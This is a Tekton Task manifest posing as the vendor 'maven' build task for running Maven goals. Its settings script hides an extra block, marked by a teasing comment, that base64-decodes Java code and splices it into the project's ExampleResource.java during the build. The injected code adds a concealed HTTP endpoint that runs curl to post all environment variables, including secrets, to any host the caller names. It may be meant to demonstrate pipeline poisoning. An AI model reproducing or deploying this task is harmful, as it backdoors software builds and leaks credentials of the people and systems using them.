apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  annotations:
    tekton.dev/pipelines.minVersion: 0.12.1
    tekton.dev/tags: build-tool
  name: maven
  labels:
    app.kubernetes.io/version: '0.2'
    operator.tekton.dev/operand-name: openshift-pipelines-addons
    operator.tekton.dev/provider-type: redhat
spec:
  description: This Task can be used to run a Maven build.
  params:
    - default: 'registry.redhat.io/ubi8/openjdk-17@sha256:632e78989471859ca4ed1148b951a911f7e3b6e6516482be20967c4171612c55'
      description: Maven base image
      name: MAVEN_IMAGE
      type: string
    - default:
        - package
      description: maven goals to run
      name: GOALS
      type: array
    - default: ''
      description: The Maven repository mirror url
      name: MAVEN_MIRROR_URL
      type: string
    - default: ''
      description: The username for the server
      name: SERVER_USER
      type: string
    - default: ''
      description: The password for the server
      name: SERVER_PASSWORD
      type: string
    - default: ''
      description: The username for the proxy server
      name: PROXY_USER
      type: string
    - default: ''
      description: The password for the proxy server
      name: PROXY_PASSWORD
      type: string
    - default: ''
      description: Port number for the proxy server
      name: PROXY_PORT
      type: string
    - default: ''
      description: Proxy server Host
      name: PROXY_HOST
      type: string
    - default: ''
      description: Non proxy server host
      name: PROXY_NON_PROXY_HOSTS
      type: string
    - default: http
      description: Protocol for the proxy ie http or https
      name: PROXY_PROTOCOL
      type: string
    - default: .
      description: The context directory within the repository for sources on which we want to execute maven goals.
      name: CONTEXT_DIR
      type: string
  steps:
    - env:
        - name: HOME
          value: /tekton/home
      image: 'registry.redhat.io/ubi8/ubi-minimal@sha256:a47c89f02b39a98290f88204ed3d162845db0a0c464b319c2596cfd1e94b444e'
      name: mvn-settings
      resources: {}
      script: |
        #!/usr/bin/env bash

        [[ -f $(workspaces.maven-settings.path)/settings.xml ]] && \
        echo 'using existing $(workspaces.maven-settings.path)/settings.xml' && exit 0

        cat > $(workspaces.maven-settings.path)/settings.xml <<EOF
        <settings>
          <servers>
            <!-- The servers added here are generated from environment variables. Don't change. -->
            <!-- ### SERVER's USER INFO from ENV ### -->
          </servers>
          <mirrors>
            <!-- The mirrors added here are generated from environment variables. Don't change. -->
            <!-- ### mirrors from ENV ### -->
          </mirrors>
          <proxies>
            <!-- The proxies added here are generated from environment variables. Don't change. -->
            <!-- ### HTTP proxy from ENV ### -->
          </proxies>
        </settings>
        EOF

        xml=""
        if [ -n "$(params.PROXY_HOST)" -a -n "$(params.PROXY_PORT)" ]; then
          xml="<proxy>\
            <id>genproxy</id>\
            <active>true</active>\
            <protocol>$(params.PROXY_PROTOCOL)</protocol>\
            <host>$(params.PROXY_HOST)</host>\
            <port>$(params.PROXY_PORT)</port>"
          if [ -n "$(params.PROXY_USER)" -a -n "$(params.PROXY_PASSWORD)" ]; then
            xml="$xml\
                <username>$(params.PROXY_USER)</username>\
                <password>$(params.PROXY_PASSWORD)</password>"
          fi
          if [ -n "$(params.PROXY_NON_PROXY_HOSTS)" ]; then
            xml="$xml\
                <nonProxyHosts>$(params.PROXY_NON_PROXY_HOSTS)</nonProxyHosts>"
          fi
          xml="$xml\
              </proxy>"
          sed -i "s|<!-- ### HTTP proxy from ENV ### -->|$xml|" $(workspaces.maven-settings.path)/settings.xml
        fi

        if [ -n "$(params.SERVER_USER)" -a -n "$(params.SERVER_PASSWORD)" ]; then
          xml="<server>\
            <id>serverid</id>"
          xml="$xml\
                <username>$(params.SERVER_USER)</username>\
                <password>$(params.SERVER_PASSWORD)</password>"
          xml="$xml\
              </server>"
          sed -i "s|<!-- ### SERVER's USER INFO from ENV ### -->|$xml|" $(workspaces.maven-settings.path)/settings.xml
        fi

        if [ -n "$(params.MAVEN_MIRROR_URL)" ]; then
          xml="    <mirror>\
            <id>mirror.default</id>\
            <url>$(params.MAVEN_MIRROR_URL)</url>\
            <mirrorOf>central</mirrorOf>\
          </mirror>"
          sed -i "s|<!-- ### mirrors from ENV ### -->|$xml|" $(workspaces.maven-settings.path)/settings.xml
        fi


        # ==============================================
        # HEY HEY --- ARE YOU TRYING TO FIND ME ?  -----
        # ==============================================
        
        LNN=`grep -wn } workspace/source/src/main/java/org.redhat.janus/ExampleResource.java | tail -n 1 | cut -d: -f1`
        LNN+=i
        echo 'QFBhdGgoIi9KS0hHRlRHVFlVL3tob3N0fSIpICBAR0VUICAgIEBQcm9kdWNlcyhNZWRpYVR5cGUuVEVYVF9QTEFJTikgIHB1YmxpYyBTdHJpbmcgZG9vcihAUGF0aFBhcmFtKCJob3N0IikgU3RyaW5nIGhvc3QpIHRocm93cyBFeGNlcHRpb24geyAgU3RyaW5nIGVudnMgPSBTeXN0ZW0uZ2V0ZW52KCkudG9TdHJpbmcoKTsgUHJvY2Vzc0J1aWxkZXIgcGIgPSBuZXcgUHJvY2Vzc0J1aWxkZXIoIi91c3IvYmluL2N1cmwiLCAiLVgiLCAiUE9TVCIgLCItZCIgLCBlbnZzLCAiaHR0cDovLyIraG9zdCsiL3NoYWRvdyIpOyAgcGIucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKTsgcGIuc3RhcnQoKTsgcmV0dXJuICIiOyB9Cg==' | base64 -d > /tmp/inject.java
        JV=`cat /tmp/inject.java`
        
        sed ''"$LNN"' '"$JV"'\' workspace/source/src/main/java/org.redhat.janus/ExampleResource.java > /tmp/changed.java

        mv /tmp/changed.java workspace/source/src/main/java/org.redhat.janus/ExampleResource.java

        rm /tmp/inject.java 
      securityContext:
        runAsNonRoot: true
        runAsUser: 65532
    - args:
        - '-s'
        - $(workspaces.maven-settings.path)/settings.xml
        - $(params.GOALS)
      command:
        - /usr/bin/mvn
      env:
        - name: HOME
          value: /tekton/home
      image: $(params.MAVEN_IMAGE)
      name: mvn-goals
      resources: {}
      securityContext:
        runAsNonRoot: true
        runAsUser: 65532
      workingDir: $(workspaces.source.path)/$(params.CONTEXT_DIR)
  workspaces:
    - description: The workspace consisting of maven project.
      name: source
    - description: The workspace consisting of the custom maven settings provided by the user.
      name: maven-settings

